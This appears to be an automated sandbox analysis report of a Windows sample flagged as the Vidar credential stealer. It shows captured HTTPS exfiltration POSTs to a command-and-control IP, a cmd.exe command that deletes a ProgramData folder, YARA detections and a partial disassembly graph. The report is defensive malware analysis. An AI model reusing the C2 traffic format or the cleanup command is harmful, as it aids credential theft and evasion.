                                                                                  2024-05-15 18:36:29 UTC16355OUTData Raw: 73 59 34 62 53 50 55 49 6d 64 56 2b 58 6f 36 6b 34 48 63 67 63 6b 2b 39 5a 2f 69 2b 36 65 48 78 66 71 65 35 44 73 38 34 34 49 72 61 74 76 46 65 70 32 59 6c 46 74 39 6e 69 45 73 68 6c 63 4a 43 41 43 78 36 6e 38 63 56 6b 58 6b 37 33 39 7a 4c 63 58 47 47 6b 6c 62 63 78 78 31 4e 65 4e 4c 4b 71 6c 64 32 71 36 4a 4c 51 2b 79 77 48 46 64 48 4c 61 6e 74 61 55 65 64 76 52 70 36 61 65 54 31 37 49 78 68 71 4d 66 2b 31 2b 56 42 31 4a 6d 4f 32 47 4e 6d 62 33 71 39 39 6a 74 79 66 38 41 55 70 2b 56 53 4a 45 6b 59 77 69 41 66 51 56 6a 44 68 75 6e 7a 58 6c 4c 51 39 32 74 34 6b 30 65 54 39 31 68 33 7a 65 62 56 76 77 58 2b 52 44 62 4a 4d 52 76 6e 62 35 6a 32 71 78 53 30 6d 4b 39 2f 44 34 61 6e 68 34 63 6c 4e 57 52 2b 62 35 6e 6d 6d 4a 7a 50 45 50 45 59 6c 33 66 34 4a 64 6b
                                                                                  Data Ascii: sY4bSPUImdV+Xo6k4Hcgck+9Z/i+6eHxfqe5Ds844IratvFep2YlFt9niEshlcJCACx6n8cVkXk739zLcXGGklbcxx1NeNLKqld2q6JLQ+ywHFdHLantaUedvRp6aeT17IxhqMf+1+VB1JmO2GNmb3q99jtyf8AUp+VSJEkYwiAfQVjDhunzXlLQ92t4k0eT91h3zebVvwX+RDbJMRvnb5j2qxS0mK9/D4anh4clNWR+b5nmmJzPEPEYl3f4Jdk
                                                                                  2024-05-15 18:36:29 UTC16355OUTData Raw: 4e 46 6c 4f 66 34 63 66 55 30 38 57 44 39 35 46 48 30 71 39 6a 31 6f 70 65 30 6b 46 69 6f 74 68 48 33 64 6a 39 42 55 67 73 34 42 2f 43 54 39 54 56 6a 36 30 56 50 4e 4c 75 4f 78 55 75 34 59 30 74 47 5a 45 55 45 4d 42 78 53 61 63 66 6c 6c 36 64 71 6c 76 66 2b 50 46 2f 77 44 66 48 39 61 68 30 34 38 53 2f 68 54 54 62 67 78 64 53 37 7a 36 30 55 55 56 41 77 70 61 51 55 74 4d 41 6f 6f 70 65 6c 49 41 6f 7a 6d 69 69 6b 49 4b 50 70 52 52 51 41 43 6c 70 50 77 70 65 31 41 42 2b 4e 4c 53 41 55 74 49 51 55 74 4a 33 6f 46 41 42 53 69 6a 47 65 61 4b 41 46 46 58 39 4f 36 58 58 2f 58 74 4a 56 41 56 6f 61 64 31 75 52 2f 30 37 76 38 41 79 72 43 74 38 44 45 74 7a 68 48 36 31 45 54 55 72 39 54 55 52 72 32 34 62 48 54 45 51 38 43 6d 64 44 54 7a 37 55 30 43 74 43 78 70 37 55 30
                                                                                  Data Ascii: NFlOf4cfU08WD95FH0q9j1ope0kFiothH3dj9BUgs4B/CT9TVj60VPNLuOxUu4Y0tGZEUEMBxSacfll6dqlvf+PF/wDfH9ah048S/hTTbgxdS7z60UUVAwpaQUtMAoopelIAozmiikIKPpRRQAClpPwpe1AB+NLSAUtIQUtJ3oFABSijGeaKAFFX9O6XX/XtJVAVoad1uR/07v8AyrCt8DEtzhH61ETUr9TURr24bHTEQ8CmdDTz7U0CtCxp7U0
                                                                                  2024-05-15 18:36:29 UTC16355OUTData Raw: 36 63 5a 56 73 64 6b 33 6d 2f 62 44 2b 39 55 5a 38 76 79 38 37 41 49 2f 76 39 7a 33 34 71 43 4f 30 31 48 58 56 74 39 52 74 2f 74 54 36 59 74 6a 45 49 58 74 31 4a 53 32 6b 43 44 7a 51 35 48 2b 72 62 66 75 59 35 78 6e 49 50 51 31 72 48 4d 33 4b 58 49 6c 62 58 72 74 62 58 38 37 47 45 73 6a 55 49 65 30 6c 4b 36 74 73 74 37 36 61 66 4b 35 73 41 4d 5a 54 45 49 35 54 4b 42 6b 78 69 4e 74 33 54 50 54 47 65 6e 4e 4e 56 74 37 73 69 4b 37 4f 72 42 57 52 55 4a 49 4a 49 55 41 67 63 35 79 51 50 71 63 56 68 33 72 54 79 2b 48 52 65 52 7a 37 5a 39 51 68 68 30 77 62 54 38 77 61 49 2f 76 47 78 32 79 69 51 38 2f 37 5a 71 31 4a 64 58 45 32 75 65 46 44 47 4a 42 4c 71 4f 6f 77 58 64 2f 4a 32 64 6f 35 66 4b 41 48 73 53 72 75 66 64 2f 61 70 65 5a 7a 58 32 65 74 76 6e 76 39 31 74
                                                                                  Data Ascii: 6cZVsdk3m/bD+9UZ8vy87AI/v9z34qCO01HXVt9Rt/tT6YtjEIXt1JS2kCDzQ5H+rbfuY5xnIPQ1rHM3KXIlbXrtbX87GEsjUIe0lK6tst76afK5sAMZTEI5TKBkxiNt3TPTGenNNVt7siK7OrBWRUJIJIUAgc5yQPqcVh3rTy+HReRz7Z9Qhh0wbT8waI/vGx2yiQ8/7Zq1JdXE2ueFDGJBLqOowXd/J2do5fKAHsSrufd/apeZzX2etvnv91t
                                                                                  2024-05-15 18:36:29 UTC16355OUTData Raw: 45 39 61 53 6d 6e 4e 42 4e 49 71 77 74 49 61 54 4e 46 4d 59 47 6b 7a 52 30 70 4d 30 72 6a 44 4e 4a 6d 67 39 36 53 67 59 47 6b 7a 78 51 61 51 30 69 67 37 30 47 67 2f 54 70 53 55 78 68 6d 6d 30 76 57 6b 6f 47 4c 53 47 69 6a 6d 67 59 6d 61 54 70 6d 6a 76 52 6e 6a 69 6c 63 61 45 2f 7a 6d 6a 31 36 30 66 53 6a 74 36 55 44 45 50 50 31 6f 37 30 76 36 55 68 70 6a 51 6e 61 6b 36 47 6c 35 4e 49 54 6a 4e 41 77 49 4f 66 57 6b 77 65 6c 4c 6a 6e 6e 38 36 42 51 41 6d 4f 42 36 55 6e 54 46 4b 65 6c 4a 37 2f 30 6f 47 4a 2b 46 48 57 6a 70 53 65 74 4b 34 77 7a 6e 76 38 41 68 51 4b 42 78 7a 52 51 4d 53 6b 7a 53 6b 30 67 34 46 4d 41 70 4d 63 55 6f 34 39 6a 53 64 71 42 6f 39 48 6f 6f 33 43 6a 64 57 52 38 67 64 46 34 4d 2f 35 44 45 33 2f 58 75 66 38 41 30 4a 61 37 47 38 50 2b 69
                                                                                  Data Ascii: E9aSmnNBNIqwtIaTNFMYGkzR0pM0rjDNJmg96SgYGkzxQaQ0ig70Gg/TpSUxhmm0vWkoGLSGijmgYmaTpmjvRnjilcaE/zmj160fSjt6UDEPP1o70v6UhpjQnak6Gl5NITjNAwIOfWkwelLjnn86BQAmOB6UnTFKelJ7/0oGJ+FHWjpSetK4wznv8AhQKBxzRQMSkzSk0g4FMApMcUo49jSdqBo9Hoo3CjdWR8gdF4M/5DE3/Xuf8A0Ja7G8P+i
                                                                                  2024-05-15 18:36:29 UTC16355OUTData Raw: 42 4b 51 30 76 65 6b 6f 47 46 4a 53 6d 6b 6f 47 46 4a 53 30 6c 41 77 70 4b 4b 51 30 44 43 6b 70 61 53 67 41 70 44 53 30 6c 41 77 4e 4a 52 53 47 67 59 55 47 69 67 30 44 45 70 4f 39 42 6f 6f 47 4a 52 52 52 51 4d 53 67 30 55 47 67 59 6c 4a 51 61 4b 59 49 44 53 55 70 70 4b 51 78 4b 53 6c 70 4b 43 68 4f 39 42 6f 46 46 41 43 55 6d 4b 57 6b 70 6c 42 32 70 4b 57 6b 6f 41 53 69 69 6b 6f 47 46 4a 52 32 6f 4e 42 51 55 68 6f 4e 49 61 41 43 6b 70 61 53 67 59 55 6c 4c 53 48 4e 49 61 45 6f 6f 37 38 30 59 7a 54 4b 45 6f 49 7a 52 51 61 41 45 6f 50 53 6a 6f 4b 54 50 76 51 55 4a 52 6d 69 6a 48 31 6f 41 50 72 53 64 65 39 4c 31 70 4d 67 55 68 69 47 67 2b 6c 42 34 70 4b 59 77 34 78 2f 68 51 65 67 6f 36 55 48 46 41 78 4f 74 4a 6a 74 6a 4e 4f 37 2b 6c 4a 51 41 68 35 6f 36 30 5a
                                                                                  Data Ascii: BKQ0vekoGFJSmkoGFJS0lAwpKKQ0DCkpaSgApDS0lAwNJRSGgYUGig0DEpO9BooGJRRRQMSg0UGgYlJQaKYIDSUppKQxKSlpKChO9BoFFACUmKWkplB2pKWkoASiikoGFJR2oNBQUhoNIaACkpaSgYUlLSHNIaEoo780YzTKEoIzRQaAEoPSjoKTPvQUJRmijH1oAPrSde9L1pMgUhiGg+lB4pKYw4x/hQego6UHFAxOtJjtjNO7+lJQAh5o60Z
                                                                                  2024-05-15 18:36:29 UTC2016OUTData Raw: 37 69 63 6d 30 6b 2b 69 74 39 77 55 55 55 56 59 6a 73 66 44 2f 69 53 4e 62 65 4f 31 75 35 42 47 38 65 42 48 49 65 68 48 75 65 78 72 30 72 52 4e 66 31 4b 2b 66 5a 4c 71 59 57 7a 6a 58 4d 73 78 32 42 74 76 70 35 6d 4e 33 50 31 72 77 53 69 75 4f 76 68 48 4f 4d 6c 54 6c 79 74 6d 4d 4b 45 49 56 56 55 36 64 56 33 50 57 66 69 42 38 51 62 53 62 54 70 64 49 30 65 59 54 74 4d 4e 73 38 36 48 35 56 58 75 6f 39 53 61 38 6d 6f 6f 6f 77 4f 42 70 59 4f 6c 37 4f 6e 38 33 33 4f 32 76 58 6c 58 6e 7a 53 43 69 69 75 69 74 76 41 33 69 53 37 74 59 62 6d 44 54 74 38 4d 79 43 53 4e 76 50 6a 47 56 49 79 44 67 74 36 56 32 71 4c 6c 73 6a 6e 63 6b 74 32 53 2b 48 66 45 43 57 6b 58 32 4f 36 62 62 47 44 6d 4e 2f 54 32 4e 65 6d 61 48 34 67 31 4f 36 65 4b 31 74 39 53 48 6b 41 5a 4d 70 43
                                                                                  Data Ascii: 7icm0k+it9wUUUVYjsfD/iSNbeO1u5BG8eBHIehHuexr0rRNf1K+fZLqYWzjXMsx2Btvp5mN3P1rwSiuOvhHOMlTlytmMKEIVVU6dV3PWfiB8QbSbTpdI0eYTtMNs86H5VXuo9Sa8mooowOBpYOl7On833O2vXlXnzSCiiuitvA3iS7tYbmDTt8MyCSNvPjGVIyDgt6V2qLlsjnckt2S+HfECWkX2O6bbGDmN/T2NemaH4g1O6eK1t9SHkAZMpC
                                                                                  2024-05-15 18:36:30 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:36:30 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-15 18:36:30 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                  Data Ascii: 2ok0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  23192.168.2.44975995.217.240.1014435984C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-15 18:36:31 UTC325OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----JJDGCGHCGHCBFHJJKKJE
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Content-Length: 331
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:36:31 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 32 31 31 34 63 33 34 34 37 31 38 63 32 37 34 30 63 37 66 38 63 38 35 38 36 36 62 61 62 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 44 47 43 47 48 43 47 48 43 42 46 48 4a 4a 4b 4b 4a 45 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="token"5e2114c344718c2740c7f8c85866bab9------JJDGCGHCGHCBFHJJKKJEContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------JJDGCGHCGHCBFHJJKKJECont
                                                                                  2024-05-15 18:36:32 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:36:32 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-15 18:36:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  24192.168.2.44976095.217.240.1014435984C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-05-15 18:36:32 UTC325OUTPOST / HTTP/1.1
                                                                                  Content-Type: multipart/form-data; boundary=----DAAAFBKECAKEHIEBAFIE
                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 Ddg/17.4.1
                                                                                  Host: 95.217.240.101
                                                                                  Content-Length: 331
                                                                                  Connection: Keep-Alive
                                                                                  Cache-Control: no-cache
                                                                                  2024-05-15 18:36:32 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 65 32 31 31 34 63 33 34 34 37 31 38 63 32 37 34 30 63 37 66 38 63 38 35 38 36 36 62 61 62 39 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 39 65 64 32 38 37 34 36 39 63 33 37 32 31 66 64 35 63 61 66 33 34 36 35 38 30 62 32 63 66 30 64 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 41 46 42 4b 45 43 41 4b 45 48 49 45 42 41 46 49 45 0d 0a 43 6f 6e 74
                                                                                  Data Ascii: ------DAAAFBKECAKEHIEBAFIEContent-Disposition: form-data; name="token"5e2114c344718c2740c7f8c85866bab9------DAAAFBKECAKEHIEBAFIEContent-Disposition: form-data; name="build_id"9ed287469c3721fd5caf346580b2cf0d------DAAAFBKECAKEHIEBAFIECont
                                                                                  2024-05-15 18:36:33 UTC158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Wed, 15 May 2024 18:36:33 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  2024-05-15 18:36:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Statistics

                                                                                  CPU Usage

                                                                                  Click to jump to process

                                                                                  Memory Usage

                                                                                  Click to jump to process

                                                                                  High Level Behavior Distribution

                                                                                  Click to dive into process behavior distribution

                                                                                  Behavior

                                                                                  Click to jump to process

                                                                                  System Behavior

                                                                                  General

                                                                                  Target ID:0
                                                                                  Start time:20:35:49
                                                                                  Start date:15/05/2024
                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                  Imagebase:0x6e0000
                                                                                  File size:382'976 bytes
                                                                                  MD5 hash:B580FF2D001291BF58BDD23A058EF21B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:1
                                                                                  Start time:20:35:49
                                                                                  Start date:15/05/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:2
                                                                                  Start time:20:35:49
                                                                                  Start date:15/05/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                  Imagebase:0x4e0000
                                                                                  File size:65'440 bytes
                                                                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:3
                                                                                  Start time:20:35:49
                                                                                  Start date:15/05/2024
                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                                  Imagebase:0x910000
                                                                                  File size:65'440 bytes
                                                                                  MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:7
                                                                                  Start time:20:36:34
                                                                                  Start date:15/05/2024
                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GHIJJEGDBFII" & exit
                                                                                  Imagebase:0x7ff72bec0000
                                                                                  File size:236'544 bytes
                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:8
                                                                                  Start time:20:36:34
                                                                                  Start date:15/05/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff7699e0000
                                                                                  File size:862'208 bytes
                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:9
                                                                                  Start time:20:36:34
                                                                                  Start date:15/05/2024
                                                                                  Path:C:\Windows\SysWOW64\timeout.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:timeout /t 10
                                                                                  Imagebase:0xd00000
                                                                                  File size:25'088 bytes
                                                                                  MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:6.2%
                                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                                    Signature Coverage:2.4%
                                                                                    Total number of Nodes:2000
                                                                                    Total number of Limit Nodes:75
                                                                                    execution_graph 17306 6e107e 17311 6e3aaa 17306->17311 17312 6e3aba 17311->17312 17313 6e1083 17311->17313 17312->17313 17318 6e6b59 InitializeCriticalSectionEx 17312->17318 17315 6e751f 17313->17315 17319 6e74f2 17315->17319 17318->17312 17320 6e7508 17319->17320 17321 6e7501 17319->17321 17328 6f1c36 17320->17328 17325 6f1bb9 17321->17325 17324 6e108d 17326 6f1c36 47 API calls 17325->17326 17327 6f1bcb 17326->17327 17327->17324 17331 6f1982 17328->17331 17332 6f198e __FrameHandler3::FrameUnwindToState 17331->17332 17339 6ec954 EnterCriticalSection 17332->17339 17334 6f199c 17340 6f19dd 17334->17340 17336 6f19a9 17350 6f19d1 17336->17350 17339->17334 17341 6f19f8 17340->17341 17342 6f1a6b __FrameHandler3::FrameUnwindToState 17340->17342 17341->17342 17343 6f1a4b 17341->17343 17353 6fb7dd 17341->17353 17342->17336 17343->17342 17345 6fb7dd 47 API calls 17343->17345 17347 6f1a61 17345->17347 17346 6f1a41 17348 6f1f6f ___free_lconv_mon 14 API calls 17346->17348 17349 6f1f6f ___free_lconv_mon 14 API calls 17347->17349 17348->17343 17349->17342 17381 6ec99c LeaveCriticalSection 17350->17381 17352 6f19ba 17352->17324 17354 6fb7ea 17353->17354 17355 6fb805 17353->17355 17354->17355 17357 6fb7f6 17354->17357 17356 6fb814 17355->17356 17362 6fd00f 17355->17362 17369 6f79b0 17356->17369 17359 6ec900 __strnicoll 14 API calls 17357->17359 17361 6fb7fb __fread_nolock 17359->17361 17361->17346 17363 6fd02f HeapSize 17362->17363 17364 6fd01a 17362->17364 17363->17356 17365 6ec900 __strnicoll 14 API calls 17364->17365 17366 6fd01f 17365->17366 17367 6ec802 __strnicoll 44 API calls 17366->17367 17368 6fd02a 17367->17368 17368->17356 17370 6f79bd 17369->17370 17371 6f79c8 17369->17371 17372 6f5f8a __fread_nolock 15 API calls 17370->17372 17373 6f79d9 __InternalCxxFrameHandler 17371->17373 17374 6f79d0 17371->17374 17378 6f79c5 17372->17378 17376 6f79de 17373->17376 17377 6f7a03 HeapReAlloc 17373->17377 17380 6ef569 codecvt 2 API calls 17373->17380 17375 6f1f6f ___free_lconv_mon 14 API calls 17374->17375 17375->17378 17379 6ec900 __strnicoll 14 API calls 17376->17379 17377->17373 17377->17378 17378->17361 17379->17378 17380->17373 17381->17352 17387 6fb85c 17388 6fb875 17387->17388 17389 6fb893 17387->17389 17388->17389 17390 6f3513 2 API calls 17388->17390 17390->17388 15844 6f445a 15845 6f4467 15844->15845 15850 6f447f 15844->15850 15846 6ec900 __strnicoll 14 API calls 15845->15846 15847 6f446c 15846->15847 15848 6ec802 __strnicoll 44 API calls 15847->15848 15849 6f4477 15848->15849 15850->15849 15851 6f44de 15850->15851 15894 6f5f2e 15850->15894 15853 6f364f _Ungetc 44 API calls 15851->15853 15854 6f44f7 15853->15854 15864 6f56f1 15854->15864 15857 6f364f _Ungetc 44 API calls 15858 6f4530 15857->15858 15858->15849 15859 6f364f _Ungetc 44 API calls 15858->15859 15860 6f453e 15859->15860 15860->15849 15861 6f364f _Ungetc 44 API calls 15860->15861 15862 6f454c 15861->15862 15863 6f364f _Ungetc 44 API calls 15862->15863 15863->15849 15865 6f56fd __FrameHandler3::FrameUnwindToState 15864->15865 15866 6f571d 15865->15866 15867 6f5705 15865->15867 15869 6f57da 15866->15869 15873 6f5753 15866->15873 15965 6ec8ed 15867->15965 15871 6ec8ed __dosmaperr 14 API calls 15869->15871 15874 6f57df 15871->15874 15872 6ec900 __strnicoll 14 API calls 15893 6f44ff 15872->15893 15876 6f575c 15873->15876 15877 6f5771 15873->15877 15875 6ec900 __strnicoll 14 API calls 15874->15875 15879 6f5769 15875->15879 15880 6ec8ed __dosmaperr 14 API calls 15876->15880 15899 6f93ca EnterCriticalSection 15877->15899 15885 6ec802 __strnicoll 44 API calls 15879->15885 15882 6f5761 15880->15882 15881 6f5777 15883 6f57a8 15881->15883 15884 6f5793 15881->15884 15886 6ec900 __strnicoll 14 API calls 15882->15886 15900 6f5805 15883->15900 15887 6ec900 __strnicoll 14 API calls 15884->15887 15885->15893 15886->15879 15889 6f5798 15887->15889 15891 6ec8ed __dosmaperr 14 API calls 15889->15891 15890 6f57a3 15968 6f57d2 15890->15968 15891->15890 15893->15849 15893->15857 15895 6f1f12 __InternalCxxFrameHandler 14 API calls 15894->15895 15896 6f5f4b 15895->15896 15897 6f1f6f ___free_lconv_mon 14 API calls 15896->15897 15898 6f5f55 15897->15898 15898->15851 15899->15881 15901 6f5817 15900->15901 15904 6f582f 15900->15904 15903 6ec8ed __dosmaperr 14 API calls 15901->15903 15902 6f5b85 15906 6ec8ed __dosmaperr 14 API calls 15902->15906 15905 6f581c 15903->15905 15904->15902 15908 6f5875 15904->15908 15909 6ec900 __strnicoll 14 API calls 15905->15909 15907 6f5b8a 15906->15907 15910 6ec900 __strnicoll 14 API calls 15907->15910 15911 6f5880 15908->15911 15914 6f5824 15908->15914 15918 6f58b0 15908->15918 15909->15914 15912 6f588d 15910->15912 15913 6ec8ed __dosmaperr 14 API calls 15911->15913 15916 6ec802 __strnicoll 44 API calls 15912->15916 15915 6f5885 15913->15915 15914->15890 15917 6ec900 __strnicoll 14 API calls 15915->15917 15916->15914 15917->15912 15919 6f58c9 15918->15919 15920 6f5914 15918->15920 15921 6f58e3 15918->15921 15919->15921 15928 6f58ce 15919->15928 15924 6f5f8a __fread_nolock 15 API calls 15920->15924 15922 6ec8ed __dosmaperr 14 API calls 15921->15922 15923 6f58e8 15922->15923 15925 6ec900 __strnicoll 14 API calls 15923->15925 15927 6f5925 15924->15927 15929 6f58ef 15925->15929 15926 6fbe7c __fread_nolock 44 API calls 15930 6f5a61 15926->15930 15931 6f1f6f ___free_lconv_mon 14 API calls 15927->15931 15928->15926 15932 6ec802 __strnicoll 44 API calls 15929->15932 15933 6f5ad5 15930->15933 15936 6f5a7a GetConsoleMode 15930->15936 15934 6f592e 15931->15934 15963 6f58fa __fread_nolock 15932->15963 15935 6f5ad9 ReadFile 15933->15935 15937 6f1f6f ___free_lconv_mon 14 API calls 15934->15937 15939 6f5b4d GetLastError 15935->15939 15940 6f5af1 15935->15940 15936->15933 15941 6f5a8b 15936->15941 15938 6f5935 15937->15938 15942 6f593f 15938->15942 15943 6f595a 15938->15943 15944 6f5b5a 15939->15944 15945 6f5ab1 15939->15945 15940->15939 15946 6f5aca 15940->15946 15941->15935 15947 6f5a91 ReadConsoleW 15941->15947 15949 6ec900 __strnicoll 14 API calls 15942->15949 15971 6f5dab 15943->15971 15951 6ec900 __strnicoll 14 API calls 15944->15951 15945->15963 15977 6ec8a6 15945->15977 15958 6f5b2d 15946->15958 15959 6f5b16 15946->15959 15946->15963 15947->15946 15952 6f5aab GetLastError 15947->15952 15948 6f1f6f ___free_lconv_mon 14 API calls 15948->15914 15953 6f5944 15949->15953 15954 6f5b5f 15951->15954 15952->15945 15956 6ec8ed __dosmaperr 14 API calls 15953->15956 15957 6ec8ed __dosmaperr 14 API calls 15954->15957 15956->15963 15957->15963 15961 6f5b46 15958->15961 15958->15963 15982 6f551f 15959->15982 15995 6f5377 15961->15995 15963->15948 15966 6f243a __dosmaperr 14 API calls 15965->15966 15967 6ec8f2 15966->15967 15967->15872 16029 6f93ed LeaveCriticalSection 15968->16029 15970 6f57d8 15970->15893 15972 6f5dbf _Fputc 15971->15972 16001 6f5cca 15972->16001 15974 6f5dd4 15975 6ec320 _Fputc 44 API calls 15974->15975 15976 6f5de3 15975->15976 15976->15928 15978 6ec8ed __dosmaperr 14 API calls 15977->15978 15979 6ec8b1 __dosmaperr 15978->15979 15980 6ec900 __strnicoll 14 API calls 15979->15980 15981 6ec8c4 15980->15981 15981->15963 16020 6f522b 15982->16020 15986 6f5633 15989 